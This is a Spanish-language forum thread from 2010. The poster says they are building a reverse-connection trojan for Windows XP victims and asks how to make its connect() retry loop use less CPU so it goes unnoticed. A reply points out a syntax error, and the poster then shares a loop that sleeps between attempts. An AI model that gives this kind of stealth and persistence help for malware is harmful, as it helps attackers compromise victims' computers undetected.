elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Ayuda bucle con funcion connect()
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda bucle con funcion connect()  (Leído 2,220 veces)
luzzzifer

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Ayuda bucle con funcion connect()
« en: 9 Agosto 2010, 02:11 am »

Hola a todos:
     Es mi primer post en este magnífico foro del cual tanto aprendi, y que a medida que vaya aprendiendo iré compartiendo ese conocimiento con uds. Bueno, al grano.
     Mi problema es el siguiente: estoy programando en C un troyano de conexión inversa para Win XP 32 bits SP 2, el server estaría en mi PC y el cliente en la víctima. La cuestión es que cuando en el cliente llamaría a connect(...) y este no conectaría por tener yo la PC apagada por ejemplo, quisiera que vuelva a llamar a connect() hasta que conecte. Aquí está el bucle del que les hablo.
    No se cómo hacer para que "No consuma muchos recursos"

Código
  1. while(n=-1);
  2. {
  3. // Sleep(5000);
  4. n=connect(sock, (struct sockaddr*)&cliente, sizeof(cliente));
  5. }

    Esta parte del código me consume el %50 de uso del CPU, lo sé por el adm de tareas, y además, cuando conecta, un bucle del mismo tipo pero con recv(), también me consume lo mismo. ¿Cómo hacer para que en la PC de mi víctima no se eleve tanto el uso del CPU y mi troyano pase más desapercibido?

Cuando termine de programar cliente y server voy a postear el código así me corrigen y me ayudan a optimizarlo porque de seguro debe tener muchos errores  :laugh:

Desde ya muchas gracias!


En línea

Mr.Blue


Desconectado Desconectado

Mensajes: 441



Ver Perfil WWW
Re: Ayuda bucle con funcion connect()
« Respuesta #1 en: 9 Agosto 2010, 05:06 am »

Tanto consume? igualmente no se si te diste cuenta o te equivocastes pero aca hay algo mal

Código
  1. //forma correcta
  2. while (n==-1)
  3. {
  4. blabla
  5. }
  6.  

y creo q esta mal hubicado el post, tedria q estar en Analisis y diseño de malware. Por lo que apunta el post.
Saludos.

PD:Espera a que lo muevan en todo caso.


« Última modificación: 9 Agosto 2010, 05:16 am por Sr.Blanco » En línea

luzzzifer

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Ayuda bucle con funcion connect()
« Respuesta #2 en: 9 Agosto 2010, 05:26 am »

holas!...si, ahí esta mal porque sería operador de asignación creo, pero en el código completo lo tengo correcto. Con lo del post mil disculpas como dije anteriormente es mi primer post en este foro  ;D.

   Cuando el compilador llega a esa línea el uso de CPU sube de un 7% a un 52%. Mi PC es un Core2 2.53GHz con 1 gb de RAM.
   Cuando cierro el programa baja a un 7% o 0%...  :-\

Muchas gracias por la atención..

Lh: No hagas doble post, utiliza el botón modificar

Bueno ya le he encontrado una solución, la cual voy a postearla por si alguien se topa con el mismo error. Lo que hice fue en vez de usar
Código
  1.  
  2. while(n==-1);
  3. {
  4. Sleep(5000);
  5. n=connect(sock, (struct sockaddr*)&cliente, sizeof(cliente));
  6. }
  7.  

utilicé
Código
  1. while(1)
  2. {
  3. Sleep(5000);
  4. n=connect(sock, (struct sockaddr*)&cliente, sizeof(cliente));
  5. if(n!=-1){break;}
  6. }
  7.  

y así el uso de CPU no se va por las nubes..

Saludos!
« Última modificación: 9 Agosto 2010, 10:34 am por Littlehorse » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema con bucle y funcion feof
Programación C/C++
Franquieli 2 3,349 Último mensaje 30 Julio 2012, 21:21 pm
por Franquieli
Ejecutar funcion en bucle cada X tiempo.
Programación C/C++
Kaxperday 7 3,609 Último mensaje 13 Julio 2015, 23:54 pm
por ivancea96
ayuda Failed to connect to the database: could not connect to server metasploit
GNU/Linux
juanxo12 0 3,238 Último mensaje 6 Junio 2016, 06:37 am
por juanxo12
[RESUELTO] Mini Ayuda en bucle C++
Programación C/C++
trioper 2 1,774 Último mensaje 2 Mayo 2017, 18:41 pm
por trioper
Ayuda con bucle for
Programación C/C++
GominaTilted 4 1,513 Último mensaje 22 Octubre 2018, 23:27 pm
por GominaTilted
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines